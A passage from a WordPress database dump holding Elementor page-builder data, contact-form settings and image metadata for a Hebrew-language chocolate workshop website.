u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/06\\/logo1.png\",\"id\":190}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1392,283,'_elementor_version','0.4'),(1393,283,'_elementor_template_type','post'),(1395,284,'_wp_page_template','elementor_header_footer'),(1396,284,'_elementor_edit_mode','builder'),(1397,284,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea (\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\/ \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea)\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/06\\/logo1.png\",\"id\":190}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1398,284,'_elementor_version','0.4'),(1399,284,'_elementor_template_type','post'),(1401,285,'notification_id','788'),(1402,285,'type','success'),(1403,285,'dismissable','1'),(1404,285,'location','[\"everywhere\"]'),(1405,285,'version',''),(1406,285,'viewed','1'),(1407,285,'expiration','1543276740'),(1408,285,'plans','[]'),(1409,286,'_edit_last','1'),(1410,286,'_edit_lock','1542892717:1'),(1411,287,'_wp_attached_file','2018/11/chocolate-3012752_640.jpg'),(1412,287,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:404;s:4:\"file\";s:33:\"2018/11/chocolate-3012752_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"chocolate-3012752_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"chocolate-3012752_640-300x189.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:33:\"chocolate-3012752_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1413,287,'_wp_attachment_image_alt','סדנת שוקולד'),(1414,286,'_thumbnail_id','287'),(1415,286,'_wp_page_template','default'),(1418,286,'_yoast_wpseo_title','סדנא טעימה במתנה... - שוקולד4U'),(1419,286,'_yoast_wpseo_metadesc','כמה אפשר לקנות לבן או לבת הזוג, מתנות \"רגילות\" כמו בשמים או יום פינוק בספא? אלו מתנות מאוד יפות אך בסופו של דבר אפילו הם יתחילו לתהות... רוצים לגוון? לחצו'),(1420,286,'_yoast_wpseo_primary_category','7'),(1421,290,'_edit_last','1'),(1422,290,'_edit_lock','1543390661:1'),(1423,290,'_elementor_edit_mode','builder'),(1424,291,'_edit_last','1'),(1425,291,'_edit_lock','1543392668:1'),(1426,292,'_wp_attached_file','2018/11/pastries-756601_640.jpg'),(1427,292,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:430;s:4:\"file\";s:31:\"2018/11/pastries-756601_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"pastries-756601_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"pastries-756601_640-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:31:\"pastries-756601_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1428,292,'_wp_attachment_image_alt','טיפים לאפיה'),(1429,291,'_thumbnail_id','292'),(1430,291,'_wp_page_template','default'),(1433,291,'_yoast_wpseo_primary_category','7'),(1436,291,'_yoast_wpseo_title','5 כלים לחובבי אפיה מתחילים ומתקדמים - שוקולד4U'),(1437,291,'_yoast_wpseo_metadesc','מבקשים לפנק את עצמכם ולחדש את האבזור בארונות המטבח? אספנו עבורכם חמישה כלים שכל אופה צריך להחזיק- כנסו לגלות מה הם'),(1440,296,'_edit_last','1'),(1441,296,'_edit_lock','1546332495:1'),(1442,297,'_elementor_template_type','section'),(1443,297,'_elementor_edit_mode','builder'),(1444,298,'_elementor_template_type','page'),(1445,298,'_elementor_edit_mode','builder'),(1446,297,'_wp_page_template','default'),(1447,297,'_elementor_data','[{\"id\":\"595c4b79\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"55a018\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"42ec654b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7032c8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"68bbbdb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"262a9cad\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea 